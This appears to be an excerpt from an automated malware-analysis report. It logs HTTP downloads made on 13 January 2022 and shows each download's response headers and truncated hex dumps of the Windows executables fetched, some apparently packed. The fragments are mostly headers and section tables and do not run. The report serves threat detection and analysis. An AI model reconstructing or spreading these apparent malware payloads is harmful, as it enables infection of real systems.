ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:08 GMTContent-Type: application/octet-streamContent-Length: 357376Last-Modified: Thu, 13 Jan 2022 19:33:07 GMTConnection: keep-aliveETag: "61e07e73-57400"Expires: Thu, 20 Jan 2022 23:16:08 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 12 01 00 00 5e 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 44 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 7e 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 42 d6 00 00 00 50 00 00 00 d8 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 33 00 00 00 30 01 00 00 34 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 17 00 00 00 70 01 00 00 12 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 44 16 04 00 00 90 01 00 00 18 04 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 13 Jan 2022 23:16:09 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 ad 35 ab 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 24 03 00 00 2a 03 00 00 00 00 00 00 b0 06 00 00 20 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 1c 40 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 e4 01 00 00 00 80 03 00 50 29 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 03 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 29 03 00 00 80 03 00 30 06 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 b0 06 00 fc 78 01 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:12 GMTContent-Type: application/octet-streamContent-Length: 354816Last-Modified: Thu, 13 Jan 2022 22:06:44 GMTConnection: keep-aliveETag: "61e0a274-56a00"Expires: Thu, 20 Jan 2022 23:16:12 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f8 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 08 01 00 00 5e 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 61 01 00 c8 00 00 00 00 80 01 00 34 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 64 01 00 2c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 f0 37 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 a2 cf 00 00 00 50 00 00 00 d0 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a0 33 00 00 00 20 01 00 00 34 00 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 24 17 00 00 00 60 01 00 00 12 00 00 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 34 16 04 00 00 80 01 00 00 18 04 00 00 52 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 13 Jan 2022 23:16:13 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:58 GMTETag: "61d8c846-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:18 GMTContent-Type: application/octet-streamContent-Length: 34272Last-Modified: Thu, 13 Jan 2022 21:50:37 GMTConnection: keep-aliveETag: "61e09ead-85e0"Expires: Thu, 20 Jan 2022 23:16:18 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 34 e0 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 26 00 00 00 70 00 00 00 00 00 00 9e 45 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 45 00 00 57 00 00 00 00 60 00 00 b0 48 00 00 00 00 00 00 00 00 00 00 00 74 00 00 e0 11 00 00 00 c0 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 25 00 00 00 20 00 00 00 26 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 48 00 00 00 60 00 00 00 4a 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 45 00 00 00 00 00 00 48 00 00 00 02 00 05 00 60 26 00 00 cc 16 00 00 03 00 00 00 08 00 00 06 2c 3d 00 00 18 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dc 9c 13 30 fe 2b ae 5a d6 7a ac f3 43 b7 f3 d0 4f 41 f6 2c d8 0f c4 35 18 75 73 0e e1 16 be ef a3 3f 19 94 62 e8 f0 e1 8a fb 85 b8 87 59 42 e8 ad d3 f8 5b fd 4f 1a cd d7 dd 18 89 b6 a0 77 bf ba bb 4f 04 9e 5e 6e 66 4f 15 a1 dc 89 0c ac bd 32 89 5f 0e 1d 62 f1 53 25 4b bc 84 cf 67 2a e9 83 c4 fc ca 09 3e 4a 4e 65 92 0c e8 ad 3d 43 ca 30 5a 56 2c 40 69 a2 00 22 02 28 01 00 00 0a 00 2a 00 00 00 13 30 02 00 33 00 00 00 01 00 00 11 00 2b 0f 2b 14 2b 15 2b 16 2b 1b 2b 20 2b 00 2b 1f 2a 28 16 00 00 0a 2b ea 0a 2b e9 06 2b e8 28 05 00 00 06 2b e3 6f 17 00 00 0a 2b de 0b 2b dd 07 2b de 00 1b 30 06 00 af 00 00 00 02 00 00 11 00 00 20 00 0c 00 00 2b 04 00 00 de 0c 28 4f 00 00 0a 2b f5 26 00 00 de 00 d0 46 00 00 01 2b 57 72 01 00 00 70 28 02 00 00 06 72 29 00 00 70 28 02 00 00 06 72 2d 00 00 70 28 02 00 00 06 2b 3e 17 8d 18 00 00 01 25 16 d0 19 00 00 01 2b 36 a2 2b 3a 2b 3f 17 8d 01 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:18 GMTContent-Type: application/octet-streamContent-Length: 226816Last-Modified: Thu, 13 Jan 2022 19:31:57 GMTConnection: keep-aliveETag: "61e07e2d-37600"Expires: Thu, 20 Jan 2022 23:16:18 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a7 79 e0 61 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 70 03 00 00 04 00 00 00 00 00 00 12 8e 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 03 00 00 02 00 00 fc a7 03 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 8d 03 00 4f 00 00 00 00 a0 03 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 0c 00 00 00 88 8c 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 6e 03 00 00 20 00 00 00 70 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 00 00 00 00 a0 03 00 00 02 00 00 00 72 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 03 00 00 02 00 00 00 74 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 8d 03 00 00 00 00 00 48 00 00 00 02 00 05 00 00 98 00 00 d0 68 00 00 03 00 02 00 01 00 00 06 d0 00 01 00 b8 8b 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 00 28 15 00 00 0a 00 16 28 16 00 00 0a 00 73 0a 00 00 06 28 17 00 00 0a 00 2a 26 02 28 18 00 00 0a 00 00 2a 00 00 00 13 30 02 00 39 00 00 00 01 00 00 11 00 7e 01 00 00 04 14 fe 01 0a 06 2c 22 00 72 01 00 00 70 d0 03 00 00 02 28 19 00 00 0a 6f 1a 00 00 0a 73 1b 00 00 0a 0b 07 80 01 00 00 04 00 7e 01 00 00 04 0c 2b 00 08 2a 00 00 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 7e 02 00 00 04 0a 2b 00 06 2a 22 00 02 80 02 00 00 04 2a 13 30 03 00 21 00 00 00 03 00 00 11 00 28 03 00 00 06 72 63 00 00 70 7e 02 00 00 04 6f 1c 00 00 0a 0a 06 74 01 00 00 1b 0b 2b 00 07 2a 00 00 00 13 30 01 00 0b 00 00 00 04 00 00 11 00 7e 03 00 00 04 0a 2b 00 06 2a 22 02 28 1d 00 00 0a 00 2a 56 73 08 00 00 06 28 1e 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 5e 02 14 7d 04 00 00 04 02 28 1f 00 00 0a 00 00 02 28 14 00 00 06 00 2a 00 00 13 30 01 00 0f 00 00 00 05 00 00 11 00 73 38 00 00 06 0a 06 6f 20 00 00 0a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Thu, 13 Jan 2022 23:16:21 GMTContent-Type: application/octet-streamContent-Length: 535232Last-Modified: Thu, 13 Jan 2022 19:32:17 GMTConnection: keep-aliveETag: "61e07e41-82ac0"Expires: Thu, 20 Jan 2022 23:16:21 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 73 0f cc 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 3a 00 00 00 0a 04 00 00 00 00 00 00 a0 04 00 00 20 00 00 00 60 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 be bf 08 00 02 00 40 81 00 00 10 00 00 10 00 00 00 